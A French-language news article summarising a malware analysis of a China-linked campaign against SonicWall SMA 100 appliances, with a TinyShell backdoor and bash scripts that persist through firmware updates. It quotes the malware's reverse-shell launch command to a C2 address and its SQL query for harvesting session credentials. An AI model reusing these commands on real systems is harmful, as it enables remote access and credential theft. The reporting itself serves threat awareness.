Un logiciel malveillant cible les appliances SonicWall de la série SMA 100
Les chercheurs de Mandiant ont découvert une campagne de logiciels malveillants ciblant les appliances SonicWall SMA 100 Series et dont l'origine serait chinoise.
Le logiciel malveillant a vraisemblablement été introduit en 2021 et s'est avéré extrêmement résilient, résistant aux mises à jour des microprogrammes. Son objectif principal est de voler les informations d'identification de l'utilisateur et d'accorder à l'attaquant un accès privilégié via une variante de l'interpréteur de commandes python TinyShell.
Le logiciel malveillant se compose d'une série de scripts bash et d'un binaire ELF unique de la variante TinyShell. Le comportement général de la suite de scripts bash malveillants démontre une compréhension approfondie de l'appareil et est bien adapté au système afin d'en assurer la stabilité et la persistance.
La série SMA 100 est un système de contrôle d'accès qui permet aux utilisateurs distants de se connecter aux ressources de l'entreprise par le biais d'un portail web à authentification unique (SSO), et l'interception des informations d'identification de l'utilisateur permettrait à l'attaquant d'obtenir des informations sensibles.
Le principal point d'entrée du logiciel malveillant est un script bash appelé firewalld, qui exécute sa boucle principale une fois pour le carré du nombre de fichiers sur le système : ... ... for j in $(ls / -R) do for i in $(ls / -R) do :... Le script est chargé d'exécuter une commande SQL pour voler les informations d'identification et d'exécuter les autres composants.
La fonction initiale de firewalld lance la porte dérobée TinyShell httpsd avec la commande "nohup /bin/httpsd -cC2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &" si le processus httpsd n'est pas déjà en cours d'exécution. Ceci demande à TinyShell de fonctionner en mode reverse-shell et de contacter l'adresse IP et le port spécifiés à l'heure et au jour spécifiés par le drapeau -m, avec l'intervalle de balise déterminé par le drapeau -d. Si aucune adresse IP n'est fournie, le binaire contient une adresse IP codée en dur qui est utilisée pour le mode reverse-shell. Elle peut également être utilisée en mode shell bind d'écoute.
L'objectif principal du logiciel malveillant semble être de voler les informations d'identification hachées de tous les utilisateurs connectés. Dans firewalld, il y parvient en exécutant régulièrement la commande SQL select userName,password from Sessions contre la base de données sqlite3 /tmp/temp.db et en copiant les résultats dans le fichier texte /tmp/syslog.db créé par l'attaquant. L'appliance enregistre les informations de session, y compris les identifiants hachés, dans la base de données source /tmp/temp.db. Les hachages peuvent être déchiffrés hors ligne une fois que l'attaquant les a obtenus.
Les chercheurs ont collaboré avec l'équipe PSIRT (Product Security and Incident Response Team) de SonicWall pour analyser un appareil infecté et ont découvert que les attaquants ont travaillé dur pour rendre leur outil stable et persistant. Toutes les dix secondes, le logiciel malveillant vérifie s'il existe des mises à jour du micrologiciel et s'injecte dans la mise à jour pour continuer à collecter des informations d'identification après la mise à jour.
Les sources de cet article comprennent un article de Malwarebytes.